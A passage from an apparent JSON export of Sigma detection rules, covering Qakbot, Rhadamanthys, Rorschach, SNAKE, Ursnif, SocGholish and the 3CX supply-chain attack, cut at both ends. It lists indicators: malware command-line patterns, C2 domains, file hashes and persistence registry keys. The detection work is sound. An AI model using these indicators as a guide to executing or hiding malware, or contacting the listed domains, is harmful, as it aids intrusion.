https://tria.ge/230530-n3rxpahf9w/behavioral2\n            - 'Nikn'\n            - 'print'\n            - 'qqqb'\n            - 'qqqq'\n            - 'RS32'\n            - 'Test'\n            - 'Time'\n            - 'Updt'\n            - 'vips'\n            - 'Wind'\n            - 'WW50'\n            - 'X555'\n            - 'XL55'\n            - 'xlAutoOpen'\n            - 'XS88'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml",
    "content": "title: Qakbot Rundll32 Fake DLL Extension Execution\nid: bfd34392-c591-4009-b938-9fd985a28b85\nstatus: test\ndescription: Detects specific process tree behavior of a \"rundll32\" execution where the DLL doesn't have the \".dll\" extension. This is often linked with potential Qakbot activity.\nreferences:\n    - https://github.com/pr0xylife/Qakbot/\nauthor: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-24\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith:\n            # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\curl.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware\n            - ':\\ProgramData\\'\n            - ':\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    filter_main_extension:\n        CommandLine|contains: '.dll'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml",
    "content": "title: Qakbot Uninstaller Execution\nid: bc309b7a-3c29-4937-a4a3-e232473f9168\nstatus: test\ndescription: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet\nreferences:\n    - https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources\n    - https://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community\n    - https://www.virustotal.com/gui/file/fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0/community\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-08-31\nmodified: 2023-09-01\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\QbotUninstall.exe'\n        - Hashes|contains:\n              - 'IMPHASH=E772C815072311D6FB8C3390743E6BE5'\n              - 'SHA256=423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180'\n              - 'SHA256=559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6'\n              - 'SHA256=855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071'\n              - 'SHA256=FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml",
    "content": "title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE\nid: 5cdbc2e8-86dd-43df-9a1a-200d4745fba5\nstatus: test\ndescription: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023\nreferences:\n    - https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88\n    - https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/\n    - https://www.joesandbox.com/analysis/790122/0/html\n    - https://twitter.com/anfam17/status/1607477672057208835\nauthor: TropChaud\ndate: 2023-01-26\nmodified: 2023-02-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_rundll32:\n        - OriginalFileName: 'RUNDLL32.EXE'\n        - Image|endswith: '\\rundll32.exe'\n    selection_dll:\n        CommandLine|contains: 'nsis_uns'\n    selection_export_function:\n        CommandLine|contains: 'PrintUIEntry'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml",
    "content": "title: Rorschach Ransomware Execution Activity\nid: 0e9e6c63-1350-48c4-9fa1-7ccb235edc68\nstatus: test\ndescription: Detects Rorschach ransomware execution activity\nreferences:\n    - https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-04-04\nmodified: 2023-04-22\ntags:\n    - attack.execution\n    - attack.t1059.003\n    - attack.t1059.001\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\bcdedit.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\netsh.exe'\n            - '\\wevtutil.exe'\n            - '\\vssadmin.exe'\n        CommandLine|contains: '11111111'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/README.md",
    "content": "# SNAKE Malware\n\n## Summary\n\nOn may 9th 2023 CISA published a report detailing their investigations and analysis of the SNAKE malware that they attribute to the FSB. Here is a quick excerpt from the report.\n\n> The Snake implant is considered the most sophisticated cyber espionage tool designed and used by Center 16 of Russia’s Federal Security Service (FSB) for long-term intelligence collection on sensitive targets. To conduct operations using this tool, the FSB created a covert peer-to-peer (P2P) network of numerous Snake-infected computers worldwide. Many systems in this P2P network serve as relay nodes which route disguised operational traffic to and from Snake implants on the FSB’s ultimate targets. Snake’s custom communications protocols employ encryption and fragmentation for confidentiality and are designed to hamper detection and collection efforts\n\nYou can find more information on the threat in the following articles:\n\n- [Hunting Russian Intelligence “Snake” Malware](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)\n\n## Rules\n\n- [SNAKE Malware Kernel Driver File Indicator](./file_event_win_malware_snake_encrypted_payload_ioc.yml)\n- [SNAKE Malware Installer Name Indicators](./file_event_win_malware_snake_installers_ioc.yml)\n- [SNAKE Malware WerFault Persistence File Creation](./file_event_win_malware_snake_werfault_creation.yml)\n- [Potential SNAKE Malware Installation CLI Arguments Indicator](./proc_creation_win_malware_snake_installer_cli_args.yml)\n- [Potential SNAKE Malware Installation Binary Indicator](./proc_creation_win_malware_snake_installer_exec.yml)\n- [Potential SNAKE Malware Persistence Service Execution](./proc_creation_win_malware_snake_service_execution.yml)\n- [SNAKE Malware Covert Store Registry Key](./registry_set_malware_snake_covert_store_key.yml)\n- [Potential Encrypted Registry Blob Related To SNAKE Malware](./registry_set_malware_snake_encrypted_key.yml)\n- [SNAKE Malware Service Persistence](./win_system_malware_snake_persistence_service.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_encrypted_payload_ioc.yml",
    "content": "title: SNAKE Malware Kernel Driver File Indicator\nid: d6d9d23f-69c1-41b5-8305-fa8250bd027f\nstatus: test\ndescription: Detects SNAKE malware kernel driver file indicator\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-10\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename: 'C:\\Windows\\System32\\Com\\Comadmin.dat'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_installers_ioc.yml",
    "content": "title: SNAKE Malware Installer Name Indicators\nid: 99eccc2b-7182-442f-8806-b76cc36d866b\nstatus: test\ndescription: Detects filename indicators associated with the SNAKE malware as reported by CISA in their report\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-10\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\jpsetup.exe'\n            - '\\jpinst.exe'\n    condition: selection\nfalsepositives:\n    - Some legitimate software was also seen using these names. Apply additional filters and use this rule as a hunting basis.\nlevel: low\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_werfault_creation.yml",
    "content": "title: SNAKE Malware WerFault Persistence File Creation\nid: 64827580-e4c3-4c64-97eb-c72325d45399\nstatus: test\ndescription: Detects the creation of a file named \"WerFault.exe\" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-10\nmodified: 2023-05-18\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\WinSxS\\'\n        TargetFilename|endswith: '\\WerFault.exe'\n    filter_main_system_location:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml",
    "content": "title: Potential SNAKE Malware Installation CLI Arguments Indicator\nid: 02cbc035-b390-49fe-a9ff-3bb402c826db\nstatus: test\ndescription: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # This CLI regex is based on the following description from the report:\n        #   The jpsetup.exe installer requires two arguments to be passed via the command line for execution\n        #   The first argument is a wide character string hashed with SHA-256 twice -> We assume that the first argument is of length SHA256\n        #   The AES initialization vector (IV) consists of the first 16 bytes of the second argument to jpsetup.exe -> We assume that the second argument is of at least 16 bytes (16 characters)\n        CommandLine|re: '\\s[a-fA-F0-9]{64}\\s[a-fA-F0-9]{16}'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml",
    "content": "title: Potential SNAKE Malware Installation Binary Indicator\nid: d91ff53f-fd0c-419d-a6b8-ae038d5c3733\nstatus: test\ndescription: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\jpsetup.exe'\n            - '\\jpinst.exe'\n    filter_main_cli_name:\n        CommandLine:\n            - 'jpinst.exe'\n            - 'jpinst'\n            - 'jpsetup.exe'\n            - 'jpsetup'\n    filter_main_cli_empty:\n        CommandLine: ''\n    filter_main_cli_null:\n        CommandLine: null\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml",
    "content": "title: Potential SNAKE Malware Persistence Service Execution\nid: f7536642-4a08-4dd9-b6d5-c3286d8975ed\nstatus: test\ndescription: Detects a specific child/parent process relationship indicative of a \"WerFault\" process running from the \"WinSxS\" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA.\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\services.exe'\n        Image|startswith: 'C:\\Windows\\WinSxS\\'\n        Image|endswith: '\\WerFault.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml",
    "content": "title: SNAKE Malware Covert Store Registry Key\nid: d0fa35db-0e92-400e-aa16-d32ae2521618\nstatus: test\ndescription: Detects any registry event that targets the key 'SECURITY\\Policy\\Secrets\\n' which is a key related to SNAKE malware as described by CISA\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-11\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'SECURITY\\Policy\\Secrets\\n'\n    condition: selection\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml",
    "content": "title: Potential Encrypted Registry Blob Related To SNAKE Malware\nid: 7e163e96-b9a5-45d6-b2cd-d7d87b13c60b\nstatus: test\ndescription: Detects the creation of a registry value in the \".wav\\OpenWithProgIds\" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-10\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds\\'\n    filter_main_wav:\n        - TargetObject|endswith: '.AssocFile.WAV'\n        - TargetObject|contains: '.wav.'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Some additional tuning might be required to tune out legitimate processes that write to this key by default\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml",
    "content": "title: SNAKE Malware Service Persistence\nid: b2e60816-96b2-45bd-ba91-b63578c03ef6\nstatus: test\ndescription: Detects the creation of a service named \"WerFaultSvc\" which seems to be used by the SNAKE malware as a persistence mechanism as described by CISA in their report\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-10\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName|contains: 'WerFaultSvc' # Note: The report contains a \",\" in the name (\"WerFaultSvc,\"). Since we can't confirm if its a typo or not we don't use it\n        ImagePath|startswith: 'C:\\Windows\\WinSxS\\'\n        ImagePath|endswith: '\\WerFault.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Ursnif/proc_creation_win_malware_ursnif_cmd_redirection.yml",
    "content": "title: Ursnif Redirection Of Discovery Commands\nid: 7aaa5739-12fc-41aa-b98b-23ec27d42bdf\nstatus: test\ndescription: |\n    Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.\nreferences:\n    - Internal Research\nauthor: '@kostastsale'\ndate: 2023-07-16\ntags:\n    - attack.execution\n    - attack.t1059\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\explorer.exe'\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - '/C '\n            - ' >> *\\AppData\\local\\temp\\*.bin'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/dns_query_win_malware_socgholish_second_stage_c2.yml",
    "content": "title: Potential SocGholish Second Stage C2 DNS Query\nid: 70761fe8-6aa2-4f80-98c1-a57049c08e66\nstatus: test\ndescription: Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic\nreferences:\n    - https://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations\n    - https://www.virustotal.com/gui/file/d5661009c461a8b20e1ad22f48609cc84dd90aee9182e026659dde4d46aaf25e/relations\n    - https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update\nauthor: Dusty Miller\ndate: 2023-02-23\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        Image|endswith: '\\wscript.exe'\n        QueryName|re: '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+'\n    condition: selection\nfalsepositives:\n    - Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/README.md",
    "content": "# 3CX Supply Chain Attack\n\n## Summary\n\nOn March 29, 2023 CrowdStrike detected malicious activity, originating from a legitimate, signed binary called 3CXDesktopApp. The binary is part of a softphone system developed by 3CX.\nThe observed malicious activity consisted of beaconing to infrastructure controlled by the actors, leading to the deployment of second-stage payloads and in a few cases direct on-keyboard activity from the attackers.\n\nYou can find more information on the threat in the following articles:\n\n- [CrowdStrike Falcon Platform Detects and Prevents Active Intrusion Campaign Targeting 3CXDesktopApp Customers - By Crowdstrike](https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/)\n- [3CX Supply Chain Compromise Leads to ICONIC Incident - By Volexity](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/)\n- [3CX VoIP Software Compromise & Supply Chain Threats - By Huntress](https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats)\n- [Using THOR Lite to scan for indicators of Lazarus activity related to the 3CX compromise - By Nextron Systems](https://www.nextron-systems.com/2023/03/31/using-thor-lite-to-scan-for-indicators-of-lazarus-activity-related-to-the-3cx-compromise/)\n- [Not just an infostealer: Gopuram backdoor deployed through 3CX supply chain attack - By Kaspersky](https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/)\n- [Elastic users protected from SUDDENICON’s supply chain attack - By Elastic](https://www.elastic.co/security-labs/elastic-users-protected-from-suddenicon-supply-chain-attack)\n\n## Rules\n\n- [Potential Compromised 3CXDesktopApp Beaconing Activity - DNS](./dns_query_win_malware_3cx_compromise.yml)\n- [Malicious DLL Load By Compromised 3CXDesktopApp](./image_load_malware_3cx_compromise_susp_dll.yml)\n- [Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon](./net_connection_win_malware_3cx_compromise_beaconing_activity.yml)\n- [Potential Compromised 3CXDesktopApp Execution](./proc_creation_win_malware_3cx_compromise_execution.yml)\n- [Potential Suspicious Child Process Of 3CXDesktopApp](./proc_creation_win_malware_3cx_compromise_susp_children.yml)\n- [Potential Compromised 3CXDesktopApp Update Activity](./proc_creation_win_malware_3cx_compromise_susp_update.yml)\n- [Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy](./proxy_malware_3cx_compromise_c2_beacon_activity.yml)\n- [Potential Compromised 3CXDesktopApp ICO C2 File Download](./proxy_malware_3cx_compromise_susp_ico_requests.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/dns_query_win_malware_3cx_compromise.yml",
    "content": "title: Potential Compromised 3CXDesktopApp Beaconing Activity - DNS\nid: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8\nrelated:\n    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2\n      type: similar\n    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH\n      type: similar\n    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2\n      type: similar\n    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec\n      type: similar\n    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc\n      type: similar\n    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update\n      type: similar\n    - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad\n      type: similar\nstatus: test\ndescription: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise\nreferences:\n    - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-29\nmodified: 2023-03-31\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: dns_query\n    product: windows\ndetection:\n    selection:\n        QueryName|contains:\n            - 'akamaicontainer.com'\n            - 'akamaitechcloudservices.com'\n            - 'azuredeploystore.com'\n            - 'azureonlinecloud.com'\n            - 'azureonlinestorage.com'\n            - 'dunamistrd.com'\n            - 'glcloudservice.com'\n            - 'journalide.org'\n            - 'msedgepackageinfo.com'\n            - 'msedgeupdate.net'\n            - 'msstorageazure.com'\n            - 'msstorageboxes.com'\n            - 'officeaddons.com'\n            - 'officestoragebox.com'\n            - 'pbxcloudeservices.com'\n            - 'pbxphonenetwork.com'\n            - 'pbxsources.com'\n            - 'qwepoi123098.com'\n            - 'sbmsa.wiki'\n            - 'sourceslabs.com'\n            - 'visualstudiofactory.com'\n            - 'zacharryblogs.com'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/image_load_malware_3cx_compromise_susp_dll.yml",
    "content": "title: Malicious DLL Load By Compromised 3CXDesktopApp\nid: d0b65ad3-e945-435e-a7a9-438e62dd48e9\nrelated:\n    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2\n      type: similar\n    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH\n      type: similar\n    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2\n      type: similar\n    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2\n      type: similar\n    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec\n      type: similar\n    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc\n      type: similar\n    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update\n      type: similar\nstatus: test\ndescription: Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp\nreferences:\n    - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-31\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Hashes|contains:\n            # ffmpeg.dll\n            - 'SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896'\n            - 'SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429'\n            - 'MD5=74BC2D0B6680FAA1A5A76B27E5479CBC'\n            # d3dcompiler_47.dll\n            - 'SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03'\n            - 'SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E'\n            - 'MD5=82187AD3F0C6C225E2FBA0C867280CC9'\n            # Inner object from ffmpeg.dll\n            - 'SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952'\n            - 'SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30'\n            - 'MD5=11BC82A9BD8297BD0823BCE5D6202082'\n            # ICONIC Stealer payload\n            - 'SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423'\n            - 'SHA1=3B3E778B647371262120A523EB873C20BB82BEAF'\n            - 'MD5=7FAEA2B01796B80D180399040BB69835'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/net_connection_win_malware_3cx_compromise_beaconing_activity.yml",
    "content": "title: Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon\nid: 51eecf75-d069-43c7-9ea2-63f75499edd4\nrelated:\n    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2\n      type: similar\n    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH\n      type: similar\n    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2\n      type: similar\n    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec\n      type: similar\n    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc\n      type: similar\n    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update\n      type: similar\n    - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad\n      type: similar\nstatus: test\ndescription: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise\nreferences:\n    - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-29\nmodified: 2023-03-31\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\3CXDesktopApp.exe'\n        DestinationHostname|contains:\n            - 'akamaicontainer.com'\n            - 'akamaitechcloudservices.com'\n            - 'azuredeploystore.com'\n            - 'azureonlinecloud.com'\n            - 'azureonlinestorage.com'\n            - 'dunamistrd.com'\n            - 'glcloudservice.com'\n            - 'journalide.org'\n            - 'msedgepackageinfo.com'\n            - 'msstorageazure.com'\n            - 'msstorageboxes.com'\n            - 'officeaddons.com'\n            - 'officestoragebox.com'\n            - 'pbxcloudeservices.com'\n            - 'pbxphonenetwork.com'\n            - 'pbxsources.com'\n            - 'qwepoi123098.com'\n            - 'sbmsa.wiki'\n            - 'sourceslabs.com'\n            - 'visualstudiofactory.com'\n            - 'zacharryblogs.com'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml",
    "content": "title: Potential Compromised 3CXDesktopApp Execution\nid: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c\nrelated:\n    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2\n      type: similar\n    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH\n      type: similar\n    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2\n      type: similar\n    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2\n      type: similar\n    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc\n      type: similar\n    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update\n      type: similar\n    - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad\n      type: similar\nstatus: test\ndescription: Detects execution of known compromised version of 3CXDesktopApp\nreferences:\n    - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-29\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_hashes:\n        Hashes|contains:\n            # 3CX Desktop 18.12.407\n            - 